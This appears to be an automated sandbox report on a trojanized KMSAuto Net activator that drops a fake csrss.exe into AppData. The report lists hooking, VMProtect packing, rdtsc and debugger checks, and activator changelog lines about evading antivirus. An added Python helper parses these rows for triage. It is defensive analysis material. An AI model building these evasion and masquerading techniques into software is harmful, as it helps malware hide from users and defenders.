Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C31E7
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C51B7
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C5292
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C3B07
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Code function: 2_2_0125DE97
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Code function: 2_2_0125C190
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Code function: 2_2_01259870
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Code function: 2_2_05136FC0
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Binary or memory string: OriginalFilename vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249938903.0000000002214000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKMSAuto Net.exe8 vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7z.sfx.exe, vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe, 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameKMSAuto Net.exe8 vs ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | ReversingLabs: Detection: 56%
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Virustotal: Detection: 44%
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File read: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Process created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" /nc /s
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Process created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md "C:\Users\user\AppData\Local\MSfree Inc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c echo test>>"C:\Program Files (x86)\KMSAuto\KMSAuto Net\test.test"
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /D /c del /F /Q "test.test"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File created: C:\Users\user\AppData\Roaming\csrss.exe
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File created: C:\Users\user\AppData\Local\Temp\$inst
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@15/12@1/1
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File read: C:\Program Files (x86)\desktop.ini
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_01
Source: C:\Users\user\AppData\Roaming\csrss.exe | Mutant created: \Sessions\1\BaseNamedObjects\AE86A6D5-F9414907-A57CDE79-FB48779A-2099B0D06
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5560:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3796:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5224
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File created: C:\Program Files (x86)\KMSAuto
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: ltiples versiones del programa. Ratiborus Changelog: v1.4.9 -Added Keys for Windows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Win
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: a GVLK forcibly. -Added option to disable Task Scheduler which monitor user actions. v1.2.4.1 -Fixed bug when working with command line parameters creating a scheduled task. v1.2.4 -Activating in Auto mode starts using Windivert method. -In the
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: and makes it possible to remove them. v1.3.1.b3 -Added function for switching language interface. v1.3.1.b2 -Fixed bug when working with command line parameters creating a scheduled task. v1.3.1.b1 -Added support to activate Windows Technical P
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: eview, Windows 10. v1.3.0 -Added support to activate OEM editions: "Windows 8.1 Single Language with Bing", "Windows 8.1 with Bing" and "Windows 8.1 Pro for Education" v1.2.8 -ProduKey program updated from v1.65 to v1.66. -Replaced SppPatcher
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: Carefully read the message that appears when you click on this button! v1.1.6 -Added the ability to reset the program to default values. -New containers for modules. Unpacking modules and drivers is faster. -Task scheduler creates tasks on behalf of t
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: AP method the TAP adapter is not re-installed. v1.2.3 -Activation functions are optimized for Windows and Office. -Fixed minor bugs. -Changed the "Utilities" tab. Added "KMS Client by Hotbird64" -New KMSSS.exe supporting installation Hwid KMS-Serve
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: . v1.2.2 -Fixed date and time displayed in hexadecimal format in the log file. v1.2.1 -Added the utility from ShowHideControls miXOnIN. To convert Systems Editions. -In Professional Mode, Advanced tab, the button "Convert Office RETAIL to VL".
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: Runs on Windows 8-8.1, doesn't work on Windows 7!. -New KMSSS.exe supporting installation Hwid KMS-Server. v1.2.0 -Changed the "Settings" tab. v1.1.9.b1 -Updated program for ProduKey v1.62 v1.65 -Added the choice of Activation intervals of 10
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: nd 20 days. -Installing GVLK Key at "Utilities" tab, works through slmgr.vbs. -Changed setting keys function for "Unsupported Product" (so reports WMI OS). -Added the program KMS Log Analyzer, for easy viewing and conservation of information of the lo
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: of local host activation is excluded. -Added a second type of TAP adapter to resolve the conflict with the already established TAP VPN. -WinDivert v1.1 has been applied, so not "incidents" result in BSOD on x86 systems. -Eliminate errors when in the file
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: ng files. -Added option in the task scheduler to create the task in the ProgramData\KMSAutoS path. v1.1.1 -Added activation method with temporary substitution of 8.1 files. v1.0.9.1 -Eliminating annoying bug with non-removed service TunMirror. v
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: s :) v1.0.3 -Applied a modified KMS-Service. Allows for the use of each product your own ePID. Including CSVLK from actual key. -Changed the installation and removal of TunMirror. -Changed the installation and removal of TAP interface. -Added s
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: dows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016. v1.4.7 -New KMS-Service. v1.4.6 -Added Keys for Windows 10 and Office 2016. v1.4.5 -Fixed minor bugs. v1.4.4 -Small changes in progra
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: pport for activation of Core, Embedded Industry, Single Language, etc. v1.0.2 -Change the setting of TAP interface. -New feature for activation Backup / Restore. -Cosmetic changes to the interface. -Added the ability to create a task scheduler to ac
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: path a sign "&" (ampersand) is present. v1.0.8 -Added a setting to remove the WinDivert driver. To avoid a possible crashing of your system in a BSOD, the unconditional removal can be turned on. By default, the removal is made after reboot. -Adde
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: Evgeny972 et les personnes du forum.ru-board.com, pour l'assitance et les tests des multiples versions du programme. Journal des modifications : v1.4.9 -Added Keys for Wi
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: Office 2016 Mondo. v1.3.9 -Conversion from Office 2016 Word, Excel, Access, OneNote, OutLook, PowerPoint, Publisher RETAIL to VL. v1.3.8 -Fixed: mapping display buttons when the font is enlarged to 125%. -Added: Display the license expiration d
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: nh. Ratiborus Changelog: v1.4.9 -Added Keys for Windows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016.
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: te (180 days 0 hours 0 minutes). -Added in "Other utilities" restore system files from the disk with your version/edition of Windows. v1.3.7 -Fixed: Encoding readme_ru.txt. -Added readme.txt in the Bulgarian language. -Utility to save activati
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: -Changes in program for compatibility with antivirus software. v1.4.0 -Added: Conversion from Office 2016 Mondo. v1.3.9 -Conversion from Office 2016 Word, Excel, Access, OneNote, OutLook, PowerPoint, Publisher RETAIL to VL. v1.3.8 -Fixed: map
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: m.ru-board.com for making possible assistance and testing of multiple versions of the program. Ratiborus Changelog: v1.4.9 -Added Keys for Windows Server 201
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: ing display buttons when the font is enlarged to 125%. -Added: Display the license expiration date (180 days 0 hours 0 minutes). -Added in "Other utilities" restore system files from the disk with your version/edition of Windows. v1.3.7 -Fixed:
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: Ratiborus v1.4.9 -Added Keys for Windows Server 2016 Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016. v1.4.7 -New KMS-Service. v1.4.6 -Added Keys for Windows
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: lse positive. -Included utility MSActBackUp. -Added Keys for Windows 10 and Office 2016. -Conversion from Office 2016 RETAIL to VL. -If Office is not installed, the button "Activate Office" is disabled. -In the "About" tab you can find a link to a pa
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: -Hook method uses a modified SECO Injector. Works at Activation and Renewal intervals and set own ePID. v1.1.2b2 -Option to connect to the KMS server where Hook mode works without replacing files. -Added option in the task scheduler to create the t
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: -Small changes to the interface, added compatibility with Windows Technical Preview. -Now the program has French interface, thanks to coleo. v1.3.1.b4 -Added function that runs the script from heos(ru-board.com). This script searches for installed
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: Essentials. -KMS Server Service v2.0.3. v1.4.8 -Added Keys for Windows Server 2016. v1.4.7 -New KMS-Service. v1.4.6 -Added Keys for Windows 10 and Office 2016. v1.4.5 -Fixed minor bugs. v1.4.4 -Small changes in program code. v1.4.
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: . A random IP address is used and when the activation fails check box is cleared. -Re-compiled KMS Service. So antivirus software will not detect it as threat/false positive. -Included utility MSActBackUp. -Added Keys for Windows 10 and Office 2016. -C
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: ncoding readme_ru.txt. -Added readme.txt in the Bulgarian language. -Utility to save activation MSActBackUp v1.0.8. v1.3.6 -Updated program ProduKey v1.70 to v1.80. -Fixed: Setting keys for Office 2016. -Fixed: The task in the scheduler runs eve
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: nversion from Office 2016 RETAIL to VL. -If Office is not installed, the button "Activate Office" is disabled. -In the "About" tab you can find a link to a page with my programs. -Added program for Windows 10 "Show or hide updates" v1.3.2 -Small cha
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | String found in binary or memory: e positive. -Included utility MSActBackUp. -Added Keys for Windows 10 and Office 2016. -Conversion from Office 2016 RETAIL to VL. -If Office is not installed, the button "Activate Office" is disabled. -In the "About" tab you can find a link to a page
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | File written: C:\Users\user\AppData\Local\MSfree Inc\kmsauto.ini
Source: C:\Users\user\AppData\Roaming\csrss.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File opened: C:\Windows\SysWOW64\msftedit.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Static file information: File size 8425933 > 1048576
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_0227D2BB push eax; retf | 0_3_0227D3A2
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046BFC87 push ecx; mov dword ptr [esp], ecx | 0_3_046BFC88
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046B2E71 push eax; ret | 0_3_046B2E7B
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Code function: 0_3_046C4987 push eax; ret | 0_3_046C49A5
Source: C:\Users\user\AppData\Roaming\csrss.exe | Code function: 1_2_008A67D7 push ebp; ret | 1_2_008A686A
Source: csrss.exe.0.dr | Static PE information: section name: .vmp0
Source: csrss.exe.0.dr | Static PE information: section name: .vmp1
Source: initial sample | Static PE information: section where entry point is pointing to: .vmp1
Source: csrss.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x4cfa3d
Source: ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Static PE information: real checksum: 0x40637 should be: 0x81749e

              Persistence and Installation Behavior

Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File created: C:\Users\user\AppData\Roaming\csrss.exe
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | File created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe

              Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Roaming\csrss.exe | Memory written: PID: 5224 base: 2AF0005 value: E9 FB 99 DF 74
Source: C:\Users\user\AppData\Roaming\csrss.exe | Memory written: PID: 5224 base: 778E9A00 value: E9 0A 66 20 8B
Source: C:\Users\user\AppData\Roaming\csrss.exe | Memory written: PID: 5224 base: 2B00007 value: E9 7B 4C E2 74
Source: C:\Users\user\AppData\Roaming\csrss.exe | Memory written: PID: 5224 base: 77924C80 value: E9 8E B3 1D 8B
Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: csrss.exe, 00000001.00000002.285935539.000000000041E000.00000020.00000001.01000000.00000004.sdmp; Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\AppData\Roaming\csrss.exe; Special instruction interceptor: First address: 00000000007C5B12 instructions: rdtsc caused by: RDTSC with Trap Flag (TF)
              Source: C:\Users\user\AppData\Roaming\csrss.exe; Special instruction interceptor: First address: 00000000007D1A75 instructions: rdtsc caused by: RDTSC with Trap Flag (TF)
              Source: C:\Users\user\AppData\Roaming\csrss.exe; RDTSC instruction interceptor: First address: 00000000008DB6C4, second address: 00000000008DB6CB, instructions:
                  0x00000000 rdtsc
                  0x00000002 inc ebp
                  0x00000003 mov bh, dl
                  0x00000005 cwde
                  0x00000006 pop ebp
                  0x00000007 rdtsc
              Source: C:\Users\user\AppData\Roaming\csrss.exe; RDTSC instruction interceptor: First address: 00000000007DAB78, second address: 00000000007D1A75, instructions:
                  0x00000000 rdtsc
                  0x00000002 pop eax
                  0x00000003 jmp 00007F07147B6D5Dh
                  0x00000008 pop ebx
                  0x00000009 mov dx, sp
                  0x0000000c cmovle edx, esi
                  0x0000000f pop edx
                  0x00000010 jmp 00007F0714726433h
                  0x00000015 ret
                  0x00000016 popfd
                  0x00000017 rdtsc
              Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed (3 identical entries)
              Source: C:\Users\user\AppData\Roaming\csrss.exe; Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\csrss.exe; System information queried: ModuleInformation
              Source: Amcache.hve.4.dr; Binary or memory string: VMware
              Source: Amcache.hve.4.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: Amcache.hve.4.dr; Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.4.dr; Binary or memory string: VMware, Inc.
              Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
              Source: Amcache.hve.4.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.4.dr; Binary or memory string: VMware7,1
              Source: Amcache.hve.4.dr; Binary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.4.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.4.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.4.dr; Binary or memory string: VMware, Inc.me
              Source: Amcache.hve.4.dr; Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
              Source: Amcache.hve.4.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: Amcache.hve.4.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.4.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

              Anti Debugging

              Source: C:\Users\user\AppData\Roaming\csrss.exe; Thread information set: HideFromDebugger
              Source: C:\Users\user\AppData\Roaming\csrss.exe; System information queried: KernelDebuggerInformation
              Source: C:\Users\user\AppData\Roaming\csrss.exe; Process queried: DebugPort
              Source: C:\Users\user\AppData\Roaming\csrss.exe; Process queried: DebugObjectHandle
              Source: C:\Users\user\AppData\Roaming\csrss.exe; Process queried: DebugPort
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe; Memory allocated: page read and write | page guard
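The evasion and anti-debugging evidence above mixes three kinds of rows that deserve different weight. The Amcache.hve strings (VMware, NECVMWar, BiosVendor) come from the analysis machine's own application and device inventory hive and describe the sandbox itself; they are not evidence that the sample enumerated virtualization artifacts. The NOOPENFILEERRORBOX / FAILCRITICALERRORS rows from WerFault.exe are ordinary crash-handler error-mode settings. The rows that carry weight are the ones attributed to the dropped C:\Users\user\AppData\Roaming\csrss.exe (a system-binary name outside System32): the SBIEDLL.DLL string (Sandboxie's injected DLL), the rdtsc timing checks, ThreadHideFromDebugger, the kernel-debugger query and the DebugPort / DebugObjectHandle queries. The script below is an added example, not part of this report and not Joe Sandbox tooling: it parses report lines in the form shown on this page (and the raw export form where the process path runs straight into the behaviour label and the line ends with the "Jump to behavior" link text), collapses repeated rows, flags masquerading system names, and annotates each row with the native API I take the label to correspond to. The sample lines are copied from this report; the regular expression, the API_MAP table and the SYSTEM_NAMES list are my own assumptions.

```python
"""Triage helper for Joe Sandbox behaviour rows (added example; the line format,
API_MAP and SYSTEM_NAMES below are assumptions, not report or vendor data)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: rows copied from this report, two of them left in the raw
# export form to show that the parser tolerates it.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX",
    r"Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\csrss.exe; Thread information set: HideFromDebugger",
    r"Source: C:\Users\user\AppData\Roaming\csrss.exe; System information queried: KernelDebuggerInformation",
    r"Source: C:\Users\user\AppData\Roaming\csrss.exe; Process queried: DebugPort",
    r"Source: C:\Users\user\AppData\Roaming\csrss.exe; Process queried: DebugObjectHandle",
    r"Source: C:\Users\user\AppData\Roaming\csrss.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\csrss.exe; Special instruction interceptor: First address: 00000000007C5B12 instructions: rdtsc caused by: RDTSC with Trap Flag (TF)",
    r"Source: Amcache.hve.4.dr; Binary or memory string: VMware, Inc.",
    r"Source: csrss.exe, 00000001.00000002.285935539.000000000041E000.00000020.00000001.01000000.00000004.sdmp; Binary or memory string: SBIEDLL.DLL",
]

# Behaviour labels seen in this report; the source path may run straight into
# the label (raw export) or be separated from it by "; ".
LABELS = (
    "Process information set", "Thread information set", "System information queried",
    "Process information queried", "Process queried", "Special instruction interceptor",
    "RDTSC instruction interceptor", "Binary or memory string", "Memory allocated",
    "Process created", "Queries volume information", "Last function",
)
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?)\s*;?\s*(?P<label>" + "|".join(re.escape(x) for x in LABELS)
    + r"):\s*(?P<detail>.*?)\s*(?:Jump to behavior)?\s*$"
)

# Assumed meaning of each label at the native API level. (label, None) is a
# fallback for any detail under that label.
API_MAP: Dict[tuple, str] = {
    ("Thread information set", "HideFromDebugger"): "NtSetInformationThread(ThreadHideFromDebugger)",
    ("System information queried", "KernelDebuggerInformation"): "NtQuerySystemInformation(SystemKernelDebuggerInformation)",
    ("Process queried", "DebugPort"): "NtQueryInformationProcess(ProcessDebugPort)",
    ("Process queried", "DebugObjectHandle"): "NtQueryInformationProcess(ProcessDebugObjectHandle)",
    ("Special instruction interceptor", None): "rdtsc timing check (caught by trap-flag single-step)",
    ("RDTSC instruction interceptor", None): "back-to-back rdtsc (VM timing check)",
    ("Binary or memory string", "SBIEDLL.DLL"): "Sandboxie DLL name check",
    ("Process information set", None): "SetErrorMode / ProcessDefaultHardErrorMode (suppresses error dialogs; benign alone)",
}

# Names that legitimately live only under System32 or SysWOW64 (assumed list).
SYSTEM_NAMES = {"csrss.exe", "smss.exe", "lsass.exe", "svchost.exe", "winlogon.exe", "services.exe", "wininit.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


@dataclass(frozen=True)
class Event:
    source: str
    label: str
    detail: str


def parse_line(line: str) -> Optional[Event]:
    """Parse one report row; headings and other non-evidence lines give None."""
    m = LINE_RE.match(line.strip())
    return None if m is None else Event(m["source"].strip(), m["label"], m["detail"].strip())


def origin_of(source: str) -> str:
    """Who produced the evidence: the sample, a Windows system process, or the VM itself."""
    low = source.lower()
    if "amcache.hve" in low:
        return "environment"      # the hive inventories the sandbox hardware, not sample activity
    if low.startswith("c:\\windows\\"):
        return "system-process"   # WerFault, conhost and friends
    return "sample"


def is_masquerading(source: str) -> bool:
    """True when a System32-only binary name sits outside the system directories."""
    path = source.split(",")[0].strip()   # "csrss.exe, <dump id>" -> bare name
    if "\\" not in path:
        return False                      # no directory known, cannot judge
    name = path.rsplit("\\", 1)[-1].lower()
    return name in SYSTEM_NAMES and not path.lower().startswith(SYSTEM_DIRS)


def triage(lines: List[str]) -> List[dict]:
    """Collapse identical rows and annotate each unique event."""
    counts = Counter(ev for ev in map(parse_line, lines) if ev is not None)
    rows = []
    for ev, n in counts.items():
        api = API_MAP.get((ev.label, ev.detail), API_MAP.get((ev.label, None)))
        rows.append({"source": ev.source, "label": ev.label, "detail": ev.detail, "count": n,
                     "origin": origin_of(ev.source), "masquerade": is_masquerading(ev.source), "api": api})
    return rows


def actionable(rows: List[dict]) -> List[dict]:
    """Rows worth reporting: attributable to the sample and mapped to a known technique."""
    return [r for r in rows if r["origin"] == "sample" and r["api"] is not None]


if __name__ == "__main__":
    for r in triage(SAMPLE_LINES):
        flag = " [system name outside System32]" if r["masquerade"] else ""
        print(f'{r["count"]:>2}x {r["origin"]:<14} {r["label"]}: {r["detail"]}{flag}')
        if r["api"]:
            print(f'    -> {r["api"]}')
```

Feed the whole report's "Source:" rows to triage() and only actionable() rows need to reach a ticket; the count column shows how much of the raw list is repetition (the NOOPENFILEERRORBOX rows alone account for over thirty lines above).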
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe; Process created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" /nc /s
              Source: C:\Users\user\Desktop\ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe; Process created: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe "C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe" /nc
